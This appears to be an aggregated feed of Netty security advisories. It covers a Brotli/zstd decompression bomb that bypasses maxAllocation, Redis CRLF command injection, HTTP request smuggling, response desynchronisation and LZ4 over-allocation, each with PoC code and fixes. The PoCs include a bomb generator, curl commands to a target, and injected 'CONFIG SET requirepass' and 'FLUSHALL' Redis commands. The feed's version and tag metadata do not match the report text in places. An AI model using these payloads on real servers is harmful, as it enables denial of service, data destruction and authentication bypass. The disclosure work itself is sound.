All versions < 0.1.2, 0.10.0, 0.11.0, 0.11.1, 0.11.2

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

High
📦 io.netty:netty-codec-http 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ## Summary `HttpContentDecompressor` accepts a `maxAllocation` parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via `ZlibDecoder`, but is silently ignored when the content encodin...
📅 2026-05-07 OSV/Maven 🔗 Details

Full description

## Summary

`HttpContentDecompressor` accepts a `maxAllocation` parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via `ZlibDecoder`, but is silently ignored when the content encoding is `br` (Brotli), `zstd`, or `snappy`. An attacker can bypass the configured decompression limit by sending a compressed payload with `Content-Encoding: br` instead of `Content-Encoding: gzip`, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in `DelegatingDecompressorFrameListener` for HTTP/2 connections.

## Details

`HttpContentDecompressor` stores the `maxAllocation` value at construction time (`HttpContentDecompressor.java:89`) and uses it in `newContentDecoder()` to create the appropriate decompression handler. For gzip/deflate, `maxAllocation` is forwarded to `ZlibCodecFactory.newZlibDecoder()`:

```java
// HttpContentDecompressor.java:101 — maxAllocation IS enforced
.handlers(ZlibCodecFactory.newZlibDecoder(ZlibWrapper.GZIP, maxAllocation))
```

`ZlibDecoder.prepareDecompressBuffer()` enforces this as a hard cap by setting the buffer's `maxCapacity` and throwing `DecompressionException` when the limit is reached:

```java
// ZlibDecoder.java:68 — hard limit on buffer capacity
return ctx.alloc().heapBuffer(Math.min(preferredSize, maxAllocation), maxAllocation);

// ZlibDecoder.java:80 — throws when exceeded
throw new DecompressionException("Decompression buffer has reached maximum size: " + buffer.maxCapacity());
```

For brotli, zstd, and snappy, the decoders are created without any size limit:

```java
// HttpContentDecompressor.java:120 — maxAllocation IGNORED
.handlers(new BrotliDecoder())

// HttpContentDecompressor.java:129 — maxAllocation IGNORED
.handlers(new SnappyFrameDecoder())

// HttpContentDecompressor.java:138 — maxAllocation IGNORED
.handlers(new ZstdDecoder())
```

`BrotliDecoder` has no `maxAllocation` parameter at all — there is no way to constrain its output. It streams decompressed data in chunks via `fireChannelRead` with no total limit. `ZstdDecoder()` defaults to a 4MB `maximumAllocationSize`, but this only constrains individual buffer allocations, not total output. The decode loop (`ZstdDecoder.java:100-114`) creates new buffers and fires `channelRead` repeatedly, so total decompressed output is unbounded.

The identical pattern exists in `DelegatingDecompressorFrameListener.newContentDecompressor()` at lines 188-210 for HTTP/2.

## PoC

1. Configure a Netty HTTP server with decompression bomb protection:

```java
pipeline.addLast(new HttpContentDecompressor(1048576)); // 1MB max
pipeline.addLast(new HttpObjectAggregator(1048576));    // 1MB max
```

2. Generate a brotli-compressed bomb (~1KB compressed → 1GB decompressed):

```python
import brotli
bomb = b'\x00' * (1024 * 1024 * 1024)  # 1GB of zeros
compressed = brotli.compress(bomb, quality=11)
with open('bomb.br', 'wb') as f:
    f.write(compressed)  # compressed size: ~1KB
```

3. Send the bomb with gzip encoding (BLOCKED by maxAllocation):

```bash
# This is caught — ZlibDecoder enforces the 1MB limit
curl -X POST http://target:8080/api \
  -H 'Content-Encoding: gzip' \
  --data-binary @bomb.gz
# Result: DecompressionException thrown at 1MB
```

4. Send the same bomb with brotli encoding (BYPASSES maxAllocation):

```bash
# This bypasses the limit — BrotliDecoder has no maxAllocation
curl -X POST http://target:8080/api \
  -H 'Content-Encoding: br' \
  --data-binary @bomb.br
# Result: Full 1GB decompressed into memory → OOM
```

5. The same bypass works with `Content-Encoding: zstd` and `Content-Encoding: snappy`.

## Impact

- **Denial of Service**: An attacker can cause out-of-memory conditions on any Netty server that relies on `maxAllocation` for decompression bomb protection, by simply using a non-gzip content encoding.
- **False sense of security**: Developers who explicitly configure `maxAllocation` to protect against decompression bombs are not actually protected for brotli, zstd, or snappy encodings. The API documentation implies all encodings are covered.
- **Trivial bypass**: The attacker only needs to change one HTTP header (`Content-Encoding: br` instead of `Content-Encoding: gzip`) to circumvent the protection entirely.
- **Both HTTP/1.1 and HTTP/2**: The vulnerability exists in both `HttpContentDecompressor` (HTTP/1.1) and `DelegatingDecompressorFrameListener` (HTTP/2).

## Recommended Fix

Pass `maxAllocation` to all decoder constructors. For `BrotliDecoder`, which currently has no `maxAllocation` support, add the parameter:

**HttpContentDecompressor.java** — pass maxAllocation to all decoders:

```java
// Line 120: BrotliDecoder — add maxAllocation support
.handlers(new BrotliDecoder(maxAllocation))

// Line 129: SnappyFrameDecoder — add maxAllocation support
.handlers(new SnappyFrameDecoder(maxAllocation))

// Line 138: ZstdDecoder — forward the configured maxAllocation
.handlers(new ZstdDecoder(maxAllocation))
```

**DelegatingDecompressorFrameListener.java** — same fix at lines 188-210.

**BrotliDecoder** — add `maxAllocation` parameter with the same semantics as `ZlibDecoder.prepareDecompressBuffer()`: set buffer maxCapacity and throw `DecompressionException` when the total decompressed output exceeds the limit.

**SnappyFrameDecoder** — add `maxAllocation` parameter with equivalent enforcement.

**ZstdDecoder** — ensure that when `maxAllocation` is set, total output across all buffers is bounded (not just per-buffer allocation size).
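The enforcement the fix calls for, a cap on *total* decompressed output rather than per-buffer allocation, can be sketched with Python's zlib as a stand-in for the Java decoders (names are illustrative):

```python
import zlib

def decompress_bounded(data: bytes, max_output: int) -> bytes:
    """Inflate zlib-compressed data, failing once total output would exceed max_output."""
    d = zlib.decompressobj()
    out = d.decompress(data, max_output)  # never produce more than max_output bytes
    # Leftover input, or any byte still pending in the internal buffer, means
    # the cap was hit: reject instead of allocating the rest (the
    # decompression-bomb failure mode the advisory describes).
    if d.unconsumed_tail or d.decompress(b"", 1):
        raise ValueError(f"decompressed output exceeds {max_output} bytes")
    return out
```

The design point matches `ZlibDecoder`'s behavior above: the limit bounds the total bytes ever materialized, and exceeding it is a hard error rather than a per-chunk allocation hint.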

Affected versions

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Unspecified
📦 io.netty:netty-codec-redis 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 🗃️ Database ☕ Java Maven library 🎯 Local ⚪ Not exploited 🟢 Patched
💬 # Security Vulnerability Report: CRLF Injection in Netty Redis Codec Encoder ## 1. Vulnerability Summary | Field | Value | |-------|-------| | **Product** | Netty | | **Version** | 4.2.12.Final (and all prior versions with codec-redis) | | **Component** | `io.netty.handler.code...
📅 2026-05-07 OSV/Maven 🔗 Details

Full description

# Security Vulnerability Report: CRLF Injection in Netty Redis Codec Encoder

## 1. Vulnerability Summary

| Field | Value |
|-------|-------|
| **Product** | Netty |
| **Version** | 4.2.12.Final (and all prior versions with codec-redis) |
| **Component** | `io.netty.handler.codec.redis.RedisEncoder` |
| **Vulnerability Type** | CWE-93: Improper Neutralization of CRLF Sequences (CRLF Injection) |
| **Impact** | Redis Command Injection / Response Poisoning |
| **Attack Vector** | Network |
| **Attack Complexity** | Low |
| **Privileges Required** | None |
| **User Interaction** | None |
| **Scope** | Unchanged |
| **Confidentiality Impact** | High |
| **Integrity Impact** | High |
| **Availability Impact** | None |

## 2. Affected Components

The following classes in the `codec-redis` module are affected:

- `io.netty.handler.codec.redis.RedisEncoder` (encoder - no output validation)
- `io.netty.handler.codec.redis.InlineCommandRedisMessage` (no input validation)
- `io.netty.handler.codec.redis.SimpleStringRedisMessage` (no input validation)
- `io.netty.handler.codec.redis.ErrorRedisMessage` (no input validation)
- `io.netty.handler.codec.redis.AbstractStringRedisMessage` (base class - no validation)

## 3. Vulnerability Description

The Netty Redis codec encoder (`RedisEncoder`) writes user-controlled string content directly to the network output buffer without validating or sanitizing CRLF (`\r\n`) characters. Since the Redis Serialization Protocol (RESP) uses CRLF as the command/response delimiter, an attacker who can control the content of a Redis message can inject arbitrary Redis commands or forge fake responses.
### Root Cause

In `RedisEncoder.java`, the `writeString()` method (lines 103-111) writes content using `ByteBufUtil.writeUtf8()` without any validation:

```java
private static void writeString(ByteBufAllocator allocator, RedisMessageType type, String content,
                                List<Object> out) {
    ByteBuf buf = allocator.ioBuffer(type.length() + ByteBufUtil.utf8MaxBytes(content) +
                                     RedisConstants.EOL_LENGTH);
    type.writeTo(buf);
    ByteBufUtil.writeUtf8(buf, content);       // <-- NO CRLF VALIDATION
    buf.writeShort(RedisConstants.EOL_SHORT);  // <-- Appends \r\n
    out.add(buf);
}
```

The message constructors (`InlineCommandRedisMessage`, `SimpleStringRedisMessage`, `ErrorRedisMessage`) inherit from `AbstractStringRedisMessage`, which only checks for null:

```java
// AbstractStringRedisMessage.java:30-32
AbstractStringRedisMessage(String content) {
    this.content = ObjectUtil.checkNotNull(content, "content"); // NO CRLF validation
}
```

### Comparison with Similar Fixed CVEs

This vulnerability follows the exact same pattern as two previously acknowledged Netty CVEs:

| CVE | Component | Fix |
|-----|-----------|-----|
| **GHSA-jq43-27x9-3v86** | SmtpRequestEncoder - SMTP command injection | Added `SmtpUtils.validateSMTPParameters()` to check for `\r` and `\n` |
| **GHSA-84h7-rjj3-6jx4** | HttpRequestEncoder - CRLF in URI | Added `HttpUtil.validateRequestLineTokens()` to check for `\r`, `\n`, and SP |

The Redis codec has **no equivalent validation** in either the encoder or the message constructors.

## 4. Exploitability Prerequisites

This vulnerability is exploitable when **all** of the following conditions are met:

1. The application uses Netty's `codec-redis` module to communicate with a Redis server
2. User-controlled input is placed into `InlineCommandRedisMessage`, `SimpleStringRedisMessage`, or `ErrorRedisMessage` content
3. The application does **not** perform its own CRLF sanitization before constructing these message objects

**Important context**: Most production Redis clients built on Netty use the RESP array format (`ArrayRedisMessage` + `BulkStringRedisMessage`), which uses binary-safe length-prefixed encoding and is **not** affected by this vulnerability. The vulnerability specifically affects the text-based inline command mode and simple string/error response types, which use CRLF as protocol delimiters.

**Affected use cases include**:

- Custom Redis clients or proxies that use `InlineCommandRedisMessage` for simplicity
- Redis middleware/proxy layers that forward `SimpleStringRedisMessage` or `ErrorRedisMessage` responses
- Applications that construct Redis monitoring or diagnostic commands from user input
- Redis Sentinel or Cluster management tools using inline command format

## 5. Attack Scenarios

### Scenario 1: Redis Command Injection via Inline Commands

When Netty is used as a Redis client or proxy, and user-controlled data is placed into `InlineCommandRedisMessage`, an attacker can inject arbitrary Redis commands:

```java
// Application code that builds Redis commands from user input
String userKey = request.getParameter("key"); // Attacker controls this
InlineCommandRedisMessage msg = new InlineCommandRedisMessage("GET " + userKey);
channel.writeAndFlush(msg);
```

**Attack input**: `key = "foo\r\nCONFIG SET requirepass \"\"\r\nFLUSHALL"`

**Result**: Three commands sent to Redis:

1. `GET foo`
2. `CONFIG SET requirepass ""` (removes authentication!)
3. `FLUSHALL` (deletes all data!)
### Scenario 2: Redis Response Poisoning

When Netty is used as a Redis proxy/middleware, a malicious upstream Redis server (or MITM attacker) can inject fake responses:

```java
// Proxy forwarding a simple string response
SimpleStringRedisMessage response = new SimpleStringRedisMessage(upstreamResponse);
downstreamChannel.writeAndFlush(response);
```

**Malicious upstream response**: `"OK\r\n$6\r\nhacked"`

**Client sees**:

1. Simple String: `+OK` (expected response)
2. Bulk String: `$6\r\nhacked` (injected fake data!)

### Scenario 3: Error Message Injection

```java
ErrorRedisMessage error = new ErrorRedisMessage("ERR " + errorDetail);
```

**Attack input**: `errorDetail = "unknown\r\n+FAKE_SUCCESS"`

**Client sees**:

1. Error: `-ERR unknown`
2. Simple String: `+FAKE_SUCCESS` (injected fake success!)

## 6. Proof of Concept

### Full Runnable PoC Source Code (RedisEncoderCRLFInjectionPoC.java)

```java
import io.netty.buffer.ByteBuf;
import io.netty.channel.embedded.EmbeddedChannel;
import io.netty.handler.codec.redis.*;

import java.nio.charset.StandardCharsets;

/**
 * PoC: Redis Encoder CRLF Injection Vulnerability
 *
 * Demonstrates that InlineCommandRedisMessage, SimpleStringRedisMessage,
 * and ErrorRedisMessage do not validate content for CRLF characters,
 * allowing Redis command injection via the RESP protocol.
 */
public class RedisEncoderCRLFInjectionPoC {

    public static void main(String[] args) {
        System.out.println("=== Netty Redis Encoder CRLF Injection PoC ===\n");
        testInlineCommandInjection();
        testSimpleStringInjection();
        testErrorMessageInjection();
        System.out.println("\n=== PoC Complete ===");
    }

    /**
     * Test 1: Inline Command Injection
     * An attacker-controlled string injected into InlineCommandRedisMessage
     * results in multiple Redis commands being sent.
     */
    static void testInlineCommandInjection() {
        System.out.println("[TEST 1] Inline Command CRLF Injection");
        System.out.println("----------------------------------------");

        // Malicious content: inject FLUSHALL after a benign PING
        String maliciousContent = "PING\r\nCONFIG SET requirepass \"\"\r\nFLUSHALL";

        EmbeddedChannel channel = new EmbeddedChannel(new RedisEncoder());
        // This should be rejected but is accepted
        InlineCommandRedisMessage msg = new InlineCommandRedisMessage(maliciousContent);
        channel.writeOutbound(msg);

        ByteBuf output = channel.readOutbound();
        String encoded = output.toString(StandardCharsets.UTF_8);
        output.release();
        channel.finishAndReleaseAll();

        System.out.println("Input:   InlineCommandRedisMessage(\""
                + maliciousContent.replace("\r", "\\r").replace("\n", "\\n") + "\")");
        System.out.println("Encoded: \""
                + encoded.replace("\r", "\\r").replace("\n", "\\n") + "\"");

        // Count how many CRLF-delimited commands are in the output
        String[] commands = encoded.split("\r\n");
        System.out.println("Number of commands parsed by Redis: " + commands.length);
        for (int i = 0; i < commands.length; i++) {
            if (!commands[i].isEmpty()) {
                System.out.println("  Command " + (i + 1) + ": " + commands[i]);
            }
        }
        boolean vulnerable = commands.length > 1;
        System.out.println("VULNERABLE: " + (vulnerable ? "YES - Multiple commands injected!" : "NO"));
        System.out.println();
    }

    /**
     * Test 2: SimpleString Response Injection
     * When Netty acts as a Redis proxy/middleware, a malicious SimpleString
     * can inject fake responses to the downstream client.
     */
    static void testSimpleStringInjection() {
        System.out.println("[TEST 2] SimpleString Response CRLF Injection");
        System.out.println("----------------------------------------------");

        // Malicious content: inject a fake bulk string response after OK
        String maliciousContent = "OK\r\n$6\r\nhacked";

        EmbeddedChannel channel = new EmbeddedChannel(new RedisEncoder());
        SimpleStringRedisMessage msg = new SimpleStringRedisMessage(maliciousContent);
        channel.writeOutbound(msg);

        ByteBuf output = channel.readOutbound();
        String encoded = output.toString(StandardCharsets.UTF_8);
        output.release();
        channel.finishAndReleaseAll();

        System.out.println("Input:   SimpleStringRedisMessage(\""
                + maliciousContent.replace("\r", "\\r").replace("\n", "\\n") + "\")");
        System.out.println("Encoded: \""
                + encoded.replace("\r", "\\r").replace("\n", "\\n") + "\"");

        // The RESP protocol uses the first byte to determine type:
        //   '+' = Simple String, '$' = Bulk String
        // A client parsing this would see:
        //   1. "+OK\r\n"      -> Simple String "OK"
        //   2. "$6\r\nhacked" -> Bulk String "hacked" (injected!)
        boolean vulnerable = encoded.contains("+OK\r\n$6\r\nhacked");
        System.out.println("VULNERABLE: " + (vulnerable ? "YES - Response poisoning possible!" : "NO"));
        System.out.println();
    }

    /**
     * Test 3: Error Message Injection
     * Similar to SimpleString but with error messages.
     */
    static void testErrorMessageInjection() {
        System.out.println("[TEST 3] Error Message CRLF Injection");
        System.out.println("--------------------------------------");

        String maliciousContent = "ERR unknown\r\n+INJECTED_OK";

        EmbeddedChannel channel = new EmbeddedChannel(new RedisEncoder());
        ErrorRedisMessage msg = new ErrorRedisMessage(maliciousContent);
        channel.writeOutbound(msg);

        ByteBuf output = channel.readOutbound();
        String encoded = output.toString(StandardCharsets.UTF_8);
        output.release();
        channel.finishAndReleaseAll();

        System.out.println("Input:   ErrorRedisMessage(\""
                + maliciousContent.replace("\r", "\\r").replace("\n", "\\n") + "\")");
        System.out.println("Encoded: \""
                + encoded.replace("\r", "\\r").replace("\n", "\\n") + "\"");

        boolean vulnerable = encoded.contains("-ERR unknown\r\n+INJECTED_OK");
        System.out.println("VULNERABLE: " + (vulnerable ? "YES - Error + fake OK injected!" : "NO"));
        System.out.println();
    }
}
```

### How to Compile and Run

```bash
# Build Netty (skip tests for speed)
./mvnw install -pl common,buffer,codec,codec-redis,transport -DskipTests -Dcheckstyle.skip=true \
    -Denforcer.skip=true -Djapicmp.skip=true -Danimal.sniffer.skip=true \
    -Drevapi.skip=true -Dforbiddenapis.skip=true -Dspotbugs.skip=true -q

# Set classpath
JARS=$(find ~/.m2/repository/io/netty -name "netty-*.jar" -path "*/4.2.12.Final/*" \
    | grep -v sources | grep -v javadoc | tr '\n' ':')

# Compile and run
javac -cp "$JARS" RedisEncoderCRLFInjectionPoC.java
java -cp "$JARS:." RedisEncoderCRLFInjectionPoC
```

### PoC Execution Output (Verified on Netty 4.2.12.Final)

```
=== Netty Redis Encoder CRLF Injection PoC ===

[TEST 1] Inline Command CRLF Injection
----------------------------------------
Input:   InlineCommandRedisMessage("PING\r\nCONFIG SET requirepass ""\r\nFLUSHALL")
Encoded: "PING\r\nCONFIG SET requirepass ""\r\nFLUSHALL\r\n"
Number of commands parsed by Redis: 3
  Command 1: PING
  Command 2: CONFIG SET requirepass ""
  Command 3: FLUSHALL
VULNERABLE: YES - Multiple commands injected!

[TEST 2] SimpleString Response CRLF Injection
----------------------------------------------
Input:   SimpleStringRedisMessage("OK\r\n$6\r\nhacked")
Encoded: "+OK\r\n$6\r\nhacked\r\n"
VULNERABLE: YES - Response poisoning possible!

[TEST 3] Error Message CRLF Injection
--------------------------------------
Input:   ErrorRedisMessage("ERR unknown\r\n+INJECTED_OK")
Encoded: "-ERR unknown\r\n+INJECTED_OK\r\n"
VULNERABLE: YES - Error + fake OK injected!

=== PoC Complete ===
```

## 7. Impact Analysis

| Impact Category | Description |
|----------------|-------------|
| **Confidentiality** | HIGH - Attacker can execute `CONFIG GET` to extract sensitive Redis configuration, use `KEYS *` to enumerate all data |
| **Integrity** | HIGH - Attacker can execute `SET`/`DEL`/`FLUSHALL` to modify or destroy data, `CONFIG SET` to change server configuration |
| **Availability** | Can be HIGH - `FLUSHALL` destroys all data, `SHUTDOWN` stops the server, `DEBUG SLEEP` causes DoS |
| **Authentication Bypass** | `CONFIG SET requirepass ""` removes authentication |
| **Data Exfiltration** | Lua scripting via `EVAL` enables complex data extraction |

## 8. Remediation Recommendations

### Option 1: Validate in Message Constructors (Recommended)

Add CRLF validation to `AbstractStringRedisMessage`:

```java
AbstractStringRedisMessage(String content) {
    this.content = ObjectUtil.checkNotNull(content, "content");
    validateContent(content);
}

private static void validateContent(String content) {
    for (int i = 0; i < content.length(); i++) {
        char c = content.charAt(i);
        if (c == '\r' || c == '\n') {
            throw new IllegalArgumentException(
                    "Redis message content contains illegal CRLF character at index " + i);
        }
    }
}
```

### Option 2: Validate in Encoder (Defense-in-Depth)

Add validation in `RedisEncoder.writeString()`:

```java
private static void writeString(ByteBufAllocator allocator, RedisMessageType type, String content,
                                List<Object> out) {
    for (int i = 0; i < content.length(); i++) {
        char c = content.charAt(i);
        if (c == '\r' || c == '\n') {
            throw new RedisCodecException(
                    "Redis message content contains CRLF at index " + i);
        }
    }
    // ... existing encoding logic
}
```

### Option 3: Both (Best Practice)

Apply validation in both the constructor and the encoder, following the pattern used for SMTP:

- `SmtpUtils.validateSMTPParameters()` validates in the `DefaultSmtpRequest` constructor
- This provides defense-in-depth against custom `SmtpRequest` implementations

## 9. Resources

- [RESP Protocol Specification](https://redis.io/docs/reference/protocol-spec/)
- [CWE-93: Improper Neutralization of CRLF Sequences](https://cwe.mitre.org/data/definitions/93.html)
- [GHSA-jq43-27x9-3v86: Netty SMTP Command Injection](https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86)
- [GHSA-84h7-rjj3-6jx4: Netty HTTP CRLF Injection](https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4)

Affected versions

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Unspecified
📦 io.netty:netty-codec-http 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks. ### Details Netty incorrectly marks a request as chunked when malformed "Transfer-Encoding: chunked, identity" is present. According to RFC https://datatracker.ietf.org/doc/html...
📅 2026-05-07 OSV/Maven 🔗 Details

Full description

### Summary

Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks.

### Details

Netty incorrectly marks a request as chunked when a malformed "Transfer-Encoding: chunked, identity" header is present. According to [RFC 9112](https://datatracker.ietf.org/doc/html/rfc9112#name-message-body-length):

> If a Transfer-Encoding header field is present in a request and the chunked transfer coding is not the final encoding, the message body length cannot be determined reliably; the server MUST respond with the 400 (Bad Request) status code and then close the connection.

A possible scenario is when Netty is behind a proxy that doesn't reject requests with "Transfer-Encoding: chunked, identity", but prefers "Content-Length" and forwards the content to Netty.

### PoC

The test below shows Netty successfully parsing the second request, demonstrating how an attacker can smuggle a second request inside a request body.

```java
@Test
public void test() {
    String requestStr = "POST / HTTP/1.1\r\n" +
            "Host: localhost\r\n" +
            "Transfer-Encoding: chunked, identity\r\n" +
            "Content-Length: 48\r\n" +
            "\r\n" +
            "0\r\n" +
            "\r\n" +
            "GET /smuggled HTTP/1.1\r\n" +
            "Host: localhost\r\n" +
            "\r\n";
    EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
    assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));

    // Request 1
    HttpRequest request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    assertTrue(request.headers().contains("Transfer-Encoding"));
    assertFalse(request.headers().contains("Content-Length"));
    LastHttpContent last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();

    // Request 2
    request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();
}
```

### Impact

HTTP Request Smuggling: an attacker injects arbitrary HTTP requests.
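The RFC 9112 rule quoted above reduces to a small check on the Transfer-Encoding list: the request is only acceptable if "chunked" is the final coding. A hedged sketch of that rule, as a standalone helper rather than Netty's actual implementation:

```java
// Hedged sketch of the RFC 9112 §6.3 rule referenced above: a request body
// delimited by Transfer-Encoding is only well-defined when "chunked" is the
// final transfer coding. Helper name is illustrative, not part of Netty.
final class TransferEncodingCheck {
    static boolean chunkedIsFinalCoding(String transferEncoding) {
        String[] codings = transferEncoding.split(",");
        // "chunked, identity" fails here: identity, not chunked, is final,
        // so the server should answer 400 and close the connection.
        return codings[codings.length - 1].trim().equalsIgnoreCase("chunked");
    }
}
```

A decoder applying this check would reject the PoC request above instead of treating it as chunked.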

Affected versions

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

High
📦 io.netty:netty-codec-http 📌 4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5 ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary If HttpClientCodec is configured, there are use cases when a response body from one request, can be parsed as another's. ### Details HttpClientCodec pairs each inbound response with an outbound request by `queue.poll()` once per response, including for `1xx`. If the...
📅 2026-05-07 OSV/Maven 🔗 Details

Full description

### Summary

If `HttpClientCodec` is configured, there are use cases where a response body from one request can be parsed as another's.

### Details

`HttpClientCodec` pairs each inbound response with an outbound request by calling `queue.poll()` once per response, including for `1xx` responses. If the client pipelines GET then HEAD, and the server sends 103, then 200 with the GET body, then 200 for the HEAD, the queue pairs HEAD with the first 200. The HEAD rule then skips reading that message's body, so the GET entity bytes stay on the stream and the following 200 is parsed from the wrong offset.

Prerequisites:

- HTTP/1.1 pipelining
- HEAD in the pipeline
- The server sends 1xx

### PoC

```java
@Test
public void test() {
    EmbeddedChannel channel = new EmbeddedChannel(new HttpClientCodec());
    assertTrue(channel.writeOutbound(new DefaultFullHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.GET, "/1")));
    ByteBuf request = channel.readOutbound();
    request.release();
    assertNull(channel.readOutbound());
    assertTrue(channel.writeOutbound(new DefaultFullHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.HEAD, "/2")));
    request = channel.readOutbound();
    request.release();
    assertNull(channel.readOutbound());

    String responseStr = "HTTP/1.1 103 Early Hints\r\n\r\n" +
            "HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello" +
            "HTTP/1.1 200 OK\r\n\r\n";
    assertTrue(channel.writeInbound(Unpooled.copiedBuffer(responseStr, CharsetUtil.US_ASCII)));

    // Response 1
    HttpResponse response = channel.readInbound();
    assertEquals(HttpResponseStatus.EARLY_HINTS, response.status());
    LastHttpContent last = channel.readInbound();
    assertEquals(0, last.content().readableBytes());
    last.release();

    // Response 2
    response = channel.readInbound();
    assertEquals(HttpResponseStatus.OK, response.status());
    last = channel.readInbound();
    assertEquals(0, last.content().readableBytes());
    last.release();

    // Response 3
    FullHttpResponse response1 = channel.readInbound();
    assertTrue(response1.decoderResult().isFailure());
    assertEquals(0, response1.content().readableBytes());
    response1.release();
    assertFalse(channel.finish());
}
```

### Impact

Integrity/availability of HTTP parsing on that connection; unsafe reuse of the socket.
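The pairing bug comes down to deciding when a response should consume the pending-request queue. A minimal sketch of the intended rule, assuming standard RFC 9110 semantics rather than Netty's actual code:

```java
// Minimal sketch of the pairing rule implied above: interim (1xx) responses
// are not final and must not consume the pending-request queue; only the
// final response pairs with a request. 101 Switching Protocols is treated as
// terminal because it ends the HTTP/1.1 exchange. Not Netty's actual code.
final class ResponsePairing {
    static boolean consumesRequestSlot(int statusCode) {
        return statusCode >= 200 || statusCode == 101;
    }
}
```

With this rule, the 103 in the PoC leaves the GET at the head of the queue, so the first 200 pairs with GET and its 5-byte body is consumed from the correct offset.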

Affected versions

4.2.0.Alpha1, 4.2.0.Alpha2, 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

High
📦 io.netty:netty-codec-compression 📌 4.2.0.Alpha3, 4.2.0.Alpha4, 4.2.0.Alpha5, 4.2.0.Beta1, 4.2.0.Final ⛓️‍💥 Supply chain attack ☕ Java Maven library 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary Lz4FrameDecoder allocates a ByteBuf of size `decompressedLength` (up to 32 MB per block) before LZ4 runs. A peer only needs a 21-byte header plus `compressedLength` payload bytes - 22 bytes if `compressedLength == 1` - to force that allocation. ### Details io.netty.h...
📅 2026-05-07 OSV/Maven 🔗 Details

Full description

### Summary

`Lz4FrameDecoder` allocates a ByteBuf of size `decompressedLength` (up to 32 MB per block) before LZ4 runs. A peer only needs a 21-byte header plus `compressedLength` payload bytes - 22 bytes if `compressedLength == 1` - to force that allocation.

### Details

In `io.netty.handler.codec.compression.Lz4FrameDecoder#decode`, header fields are trusted for sizing. On the compressed path, after `readableBytes >= compressedLength`, the decoder does `ctx.alloc().buffer(decompressedLength, decompressedLength)` and then decompresses.

### PoC

The test below demonstrates how an attacker sending 22 bytes forces the server to allocate 32 MB:

```java
@Test
void test() throws Exception {
    EventLoopGroup workerGroup = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());
    try {
        AtomicReference<Throwable> serverError = new AtomicReference<>();
        CountDownLatch latch = new CountDownLatch(1);
        ServerBootstrap server = new ServerBootstrap()
                .group(workerGroup)
                .channel(NioServerSocketChannel.class)
                .childHandler(new ChannelInitializer<SocketChannel>() {
                    @Override
                    protected void initChannel(SocketChannel ch) {
                        ch.pipeline()
                                .addLast(new Lz4FrameDecoder())
                                .addLast(new ChannelInboundHandlerAdapter() {
                                    @Override
                                    public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
                                        if (cause instanceof DecoderException) {
                                            serverError.set(cause.getCause());
                                        } else {
                                            serverError.set(cause);
                                        }
                                        latch.countDown();
                                    }
                                });
                    }
                });
        ChannelFuture serverChannel = server.bind(0).sync();

        Bootstrap client = new Bootstrap()
                .group(workerGroup)
                .channel(NioSocketChannel.class)
                .handler(new ChannelInboundHandlerAdapter() {
                    @Override
                    public void channelActive(ChannelHandlerContext ctx) {
                        ByteBuf buf = ctx.alloc().buffer(22, 22);
                        buf.writeLong(MAGIC_NUMBER);
                        buf.writeByte(BLOCK_TYPE_COMPRESSED | 0x0F);
                        buf.writeIntLE(1);        // compressedLength
                        buf.writeIntLE(1 << 25);  // decompressedLength: 32 MB claimed
                        buf.writeIntLE(0);        // checksum
                        buf.writeByte(0);         // single payload byte
                        ctx.writeAndFlush(buf);
                        ctx.fireChannelActive();
                    }
                });
        ChannelFuture clientChannel = client.connect(serverChannel.channel().localAddress()).sync();

        assertTrue(latch.await(10, TimeUnit.SECONDS));
        assertInstanceOf(IndexOutOfBoundsException.class, serverError.get());
        clientChannel.channel().close();
        serverChannel.channel().close();
    } finally {
